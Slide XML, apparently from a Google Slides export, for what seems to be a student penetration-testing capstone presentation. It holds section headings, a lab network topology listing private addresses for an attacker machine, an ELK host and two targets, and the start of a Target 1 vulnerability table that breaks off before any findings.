        <p:nvSpPr>
          <p:cNvPr id="2344" name="Google Shape;2344;p2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6805675" y="5490650"/>
            <a:ext cx="4015200" cy="15009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SzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Exploits Used</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2345" name="Google Shape;2345;p2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12520675" y="5392750"/>
            <a:ext cx="4634700" cy="33123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SzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Methods Used to Avoiding Detection</a:t>
            </a:r>
            <a:endParaRPr sz="3700" b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2346" name="Google Shape;2346;p2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18711075" y="5172200"/>
            <a:ext cx="3930300" cy="7100700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="487575" tIns="487575" rIns="487575" bIns="487575" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr sz="3700" b="1">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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2351" name="Google Shape;2351;p3"/>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352" name="Google Shape;2352;p3"/>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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2353" name="Google Shape;2353;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731280" y="4035517"/>
            <a:ext cx="22914900" cy="2745600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750"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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network Topology</a:t>
            </a:r>
            <a:endParaRPr>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US">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="9600"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2354" name="Google Shape;2354;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-87421" y="34962844"/>
            <a:ext cx="56659500" cy="1612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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2359" name="Google Shape;2359;p4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307586" y="2427933"/>
            <a:ext cx="17860800" cy="10393500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14509"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2100"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2360" name="Google Shape;2360;p4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18382875" y="1729874"/>
            <a:ext cx="5915400" cy="110052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p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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sz="2900" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Address Range: 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Netmask: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Gateway: 192.168.1.255</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IPv4: 192.168.1.100 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OS: Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hostname: ELK</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IPv4: 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hostname: Capstone</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IPv4: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OS: Kali Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hostname:Kali </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IPv4: 192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OS: Linux 3.2 – 4.9</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hostname: Target 1 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IPv4: 192.168.1.115</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OS: Linux 3.2 – 4.9</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hostname: Target 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2361" name="Google Shape;2361;p4"/>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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2362" name="Google Shape;2362;p4"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2363" name="Google Shape;2363;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="2676525"/>
            <a:ext cx="16446700" cy="9718826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2364" name="Google Shape;2364;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076950" y="3782700"/>
            <a:ext cx="2702275" cy="1826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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2369" name="Google Shape;2369;p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Critical Vulnerabilities: Target 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2370" name="Google Shape;2370;p5"/>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6</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2371" name="Google Shape;2371;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295399"/>
            <a:ext cx="22942800" cy="10848295"/>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a:t>Our assessment uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1"/>
              <a:t>Target 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="4400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2372" name="Google Shape;2372;p5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1181100" y="3268325"/>
          <a:ext cx="21991475" cy="7846250"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{D2EE18AC-DD6A-4FD0-9572-6E9059F1DDDE}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7277100">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7382500">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789325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
